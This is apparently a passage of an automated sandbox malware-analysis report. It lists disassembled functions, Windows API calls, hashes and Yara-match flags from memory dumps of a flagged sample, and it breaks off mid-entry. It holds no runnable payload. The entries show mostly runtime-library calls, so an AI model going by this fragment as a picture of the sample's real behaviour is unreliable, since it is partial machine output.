                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6A9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2955987475-0
                                                      • Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                      • Instruction ID: aa67979d269d7af918a440dd056c145703b281dc02bc26006c70080e777cf021
                                                      • Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                      • Instruction Fuzzy Hash: 0121B6325102069BDB24AE25CC42BB773A8EB48314F10107FFE01D6241EB399D40CBA9
                                                      Function 0470B8BC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 047021B0
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021BD
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0470B910
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2955987475-0
                                                      • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                      • Instruction ID: 1689d6e0505dce5846d7969c67b02deeca2e0215d4ade6aa8bda332a0a4b1591
                                                      • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                      • Instruction Fuzzy Hash: E021A47256220AEBEB249FA4CC45B7A73ECEB04714F00817AED01D63C1E735BA44C750
                                                      Function 0043B2DD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • EnumSystemLocalesW.KERNEL32(0043B405,00000001,00000000,?,004307C5,?,0043BA32,00000000,?,?,?), ref: 0043B34F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 14f55fbb31ad8851c689f78584c84e4a4ee681de298c97b3d2f42fc3e864a110
                                                      • Instruction ID: 6e4ce59edfa406ddf073f99a830a5101e0102860886a26e515d51054ae82858a
                                                      • Opcode Fuzzy Hash: 14f55fbb31ad8851c689f78584c84e4a4ee681de298c97b3d2f42fc3e864a110
                                                      • Instruction Fuzzy Hash: 2F1129366007019FDB189F79C8A177AB791FF84358F15452DEA8687B40D7756903C784
                                                      Function 0470B544 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • EnumSystemLocalesW.KERNEL32(0043B405,00000001,00000000,?,04700A2C,?,0470BC99,00000000,?,?,?), ref: 0470B5B6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 1ac9c5adbde53f76e83641c0dce42796ddb1ef626bcd29ef27d6eb2ac8b6d43f
                                                      • Instruction ID: 53fddfa2779af93a751ddf8a8fe6548ff4cb1121cbf19b697e4b47c34b6aaa0f
                                                      • Opcode Fuzzy Hash: 1ac9c5adbde53f76e83641c0dce42796ddb1ef626bcd29ef27d6eb2ac8b6d43f
                                                      • Instruction Fuzzy Hash: 8C11253B2007059FDB189F79C8A56BABBD1FF80318B14842CEA4697B80D771BA03CB40
                                                      Function 0043B885 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B623,00000000,00000000,?), ref: 0043B8B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_free
                                                      • String ID:
                                                      • API String ID: 787680540-0
                                                      • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                      • Instruction ID: 94b9d1d5490589a6932868e5dfac91813d435d3d1e0b67a6c59256985b2caffb
                                                      • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                      • Instruction Fuzzy Hash: B1F0F932A00115ABDB2CAA65CC057BB775CEB44758F14442FEE05A3240EB79FD41D6D8
                                                      Function 0470BAEC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0470B88A,00000000,00000000,?), ref: 0470BB18
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_free
                                                      • String ID:
                                                      • API String ID: 787680540-0
                                                      • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                      • Instruction ID: 18aab14fc85ce88e2e6ac5ef58d4b43fdb63f13e289238cc0d95f570052e3fb5
                                                      • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                      • Instruction Fuzzy Hash: F6F0F432A01115FBDB289FA5CC49BBA77E8EB40754F048469ED0AA33C4EA70FF0186D4
                                                      Function 0043B378 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • EnumSystemLocalesW.KERNEL32(0043B655,00000001,?,?,004307C5,?,0043B9F6,004307C5,?,?,?,?,?,004307C5,?,?), ref: 0043B3C4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 1039935eee4cc737979e506317a8f0900afd51504772cf0596f3d30a1fd47392
                                                      • Instruction ID: b4c9de7f5d4c2c887397eacfa8f9314df51a54e7fbfb40ed20d2d2206768cf55
                                                      • Opcode Fuzzy Hash: 1039935eee4cc737979e506317a8f0900afd51504772cf0596f3d30a1fd47392
                                                      • Instruction Fuzzy Hash: 09F0C2362007045FDB249F3A9C91B6BBB95EF88768F15842EFE068B690D7B59C02C794
                                                      Function 0470B5DF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • EnumSystemLocalesW.KERNEL32(0043B655,00000001,?,?,04700A2C,?,0470BC5D,04700A2C,?,?,?,?,?,04700A2C,?,?), ref: 0470B62B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: b2abb963a5643eab399cd55212bd37e676e64f31586f1ac59a8444abe75cb648
                                                      • Instruction ID: e93c4af3d1882a65ab4111b7ff91c9302296befa2fd48c2f37fff6b9ad305daa
                                                      • Opcode Fuzzy Hash: b2abb963a5643eab399cd55212bd37e676e64f31586f1ac59a8444abe75cb648
                                                      • Instruction Fuzzy Hash: 83F022363007049FEB145FB9CC84B7ABBD0EF8072CF14846DEA058B780D6B1F9028604
                                                      Function 00434DDD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0042E3FD: EnterCriticalSection.KERNEL32(?,?,00431C8A,?,00457A38,00000008,00431D58,?,?,?), ref: 0042E40C
                                                      • EnumSystemLocalesW.KERNEL32(00434D97,00000001,00457BB8,0000000C), ref: 00434E15
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 78c62e35d859f9c5988a6fc2baf0c6bfcff86eb3529ba817c31359ffd6751637
                                                      • Instruction ID: c2e7913d7beef7da917e9693afd21c9eaa4f0891736f125ec479cf6ec0ffb40c
                                                      • Opcode Fuzzy Hash: 78c62e35d859f9c5988a6fc2baf0c6bfcff86eb3529ba817c31359ffd6751637
                                                      • Instruction Fuzzy Hash: 60F04F32A10300DFD714EF69D906B8D37E0EB05716F10416AF920DB2E6CB7999848F49
                                                      Function 04705044 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 046FE664: RtlEnterCriticalSection.NTDLL(04280DC5), ref: 046FE673
                                                      • EnumSystemLocalesW.KERNEL32(00434D97,00000001,00457BB8,0000000C), ref: 0470507C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 763cd6de35ea5bb0f615040600b69c1db79275d5f3fa9e613fc3e2590cfee591
                                                      • Instruction ID: ac3086bbf813b05582860905f1e8387b58057c61c96ea77a0cbca62c141b9af4
                                                      • Opcode Fuzzy Hash: 763cd6de35ea5bb0f615040600b69c1db79275d5f3fa9e613fc3e2590cfee591
                                                      • Instruction Fuzzy Hash: 86F03C32A11304DFE714EF68D905B5D7BE0AB05716F10416AFA10DB2E1DB75A9408B4A
                                                      Function 0043B292 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • EnumSystemLocalesW.KERNEL32(0043B1E9,00000001,?,?,?,0043BA54,004307C5,?,?,?,?,?,004307C5,?,?,?), ref: 0043B2C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 13831a7036ebc863385fba09fdbc9a645dd011081cbb64b61d5505cec730fe0a
                                                      • Instruction ID: 0ae1ac0485c1540274cb9d1e02c4d3bc42514ecfd4a0957d517fff15e368931f
                                                      • Opcode Fuzzy Hash: 13831a7036ebc863385fba09fdbc9a645dd011081cbb64b61d5505cec730fe0a
                                                      • Instruction Fuzzy Hash: 44F0E53A30020597CB049F76DC5A76BBF94EFC5764F1A409EEF058B290C77A9942C794
                                                      Function 0470B4F9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • EnumSystemLocalesW.KERNEL32(0043B1E9,00000001,?,?,?,0470BCBB,04700A2C,?,?,?,?,?,04700A2C,?,?,?), ref: 0470B530
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: f8127ac3abd046b9e22886f4815e390275be4e8c9be1d23358ed75c1eff5e80b
                                                      • Instruction ID: 52425d4f4bda8d81f1ae43ee9f2c6dc22e7d3584ecd4c25c01c1302a8358c51d
                                                      • Opcode Fuzzy Hash: f8127ac3abd046b9e22886f4815e390275be4e8c9be1d23358ed75c1eff5e80b
                                                      • Instruction Fuzzy Hash: EEF0E53A30020597CB149F79DC5976ABFD4EFC1754B1A8099EF09CB390D675EA42C790
                                                      Function 00410676 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00010682,0040FC0F), ref: 0041067B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction ID: c9cfcfeb60a121424c750bde0cb178890b8b3ed73da33a3507a234e3df48861c
                                                      • Opcode Fuzzy Hash: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction Fuzzy Hash:
                                                      Function 046E08DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00410682,046DFE76), ref: 046E08E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction ID: c9cfcfeb60a121424c750bde0cb178890b8b3ed73da33a3507a234e3df48861c
                                                      • Opcode Fuzzy Hash: bf6d707dc8b2c41b2a5ab4993f9389fcf0fb9c2c59ac606d679ed392ef9fb769
                                                      • Instruction Fuzzy Hash:
                                                      Function 0043BBD1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                      • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                      • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                      • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                      Function 004373E9 Relevance: .6, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                      • Instruction ID: 85c012ed53081dc1eef79cc2ce32c7123eff4ec8b0cf65c947085ef3536d5db3
                                                      • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                      • Instruction Fuzzy Hash: FB324662D68F014DE7339634C822336A298EFBB3D4F15E737E859B5AA5EB2CC5834105
                                                      Function 004071C1 Relevance: .4, Instructions: 378COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4791b4cce090e14dc8513036a2715920b1b30530ae8684d3ebf23ce663880f9
                                                      • Instruction ID: e89f1022fef3ce9bb4d928cc7a4c417241da36143efff2f590400b5932f12147
                                                      • Opcode Fuzzy Hash: e4791b4cce090e14dc8513036a2715920b1b30530ae8684d3ebf23ce663880f9
                                                      • Instruction Fuzzy Hash: 49E18270A08616EFD714CF24C590AAAB7F1FF44304B24457EE442ABB91D738F861DB96
                                                      Function 046F76FB Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 978a5e910df1d0a01caf20267dfbf1e5fc0c4253ee9a873c4d519ef481566b0c
                                                      • Instruction ID: 5bcafac6d4ba85f8fdfe7b6865c77a6d58738a873cb9f077e8fcf15e7ab673dc
                                                      • Opcode Fuzzy Hash: 978a5e910df1d0a01caf20267dfbf1e5fc0c4253ee9a873c4d519ef481566b0c
                                                      • Instruction Fuzzy Hash: 0CD1BA322085A34AC76D4A3D8C7003ABFE16B5226330D479ED5F7CB6C6FA24F555D660
                                                      Function 00427D77 Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: d4b045119732f6c4b61e089dfd53f5141c77cb00d8d562454f7e7704be034b71
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: 8A91857230D0B349DB294639957503FFFE15A923A139B079FE4F2CA2C1EE289954D724
                                                      Function 046F7FDE Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: 7ae10e90a52f2e8190301cace3a2fb258bc264298b4b93db1370c53cf3370fc3
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: 059175722080A34ADB2A567E8C7403EFFE15A522A131A17DED5F2CB2C5FF24E165D630
                                                      Function 00428032 Relevance: .2, Instructions: 244COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction ID: 289313d67c0a3111a55c2123911b3337c50b3c3cf8115783772010cb944f3c5d
                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction Fuzzy Hash: E391967230A0B349EB69427A953403FFFE15A923A135E07DFD4F2CB2C5EE288565D624
                                                      Function 046F8299 Relevance: .2, Instructions: 244COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction ID: 99056211728759f55da35279fe5510c5cb7c544982d766b6d5a9461978e544d3
                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction Fuzzy Hash: 5F9194732081A30ADB6A567D8C7403EFFE15A522A130A17DED5F2CB2C5FF24E554E620
                                                      Function 00427AB0 Relevance: .2, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: 96852df962a60768f3281df12c15312d75bd71a5577a0c3123a4a78a8715bc99
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: AF91637230D0B34ADB2E463AA47403FFFE15A923A539A079FD4F2CA2C1ED18D655D624
                                                      Function 046F7D17 Relevance: .2, Instructions: 240COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: 0fdcbc21c84d8a41f3edd5014ea6aea6b77d740449736b3352117f4e82f4471b
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: 269154722090A30ADB6E463D8D7403EFFE15B522A331A17AFD5F2CA2C5FE24E554D620
                                                      Function 0042D4FE Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                      • Instruction ID: 18c1aaddf8e31a418027ff40844c51ed70492bcdf6650b712559b4554c0e38a2
                                                      • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                      • Instruction Fuzzy Hash: BD6144B1F0063876DA389A2CB895BBF23949F41748FE0051BE446DB381D69DDD82C64E
                                                      Function 046FD765 Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
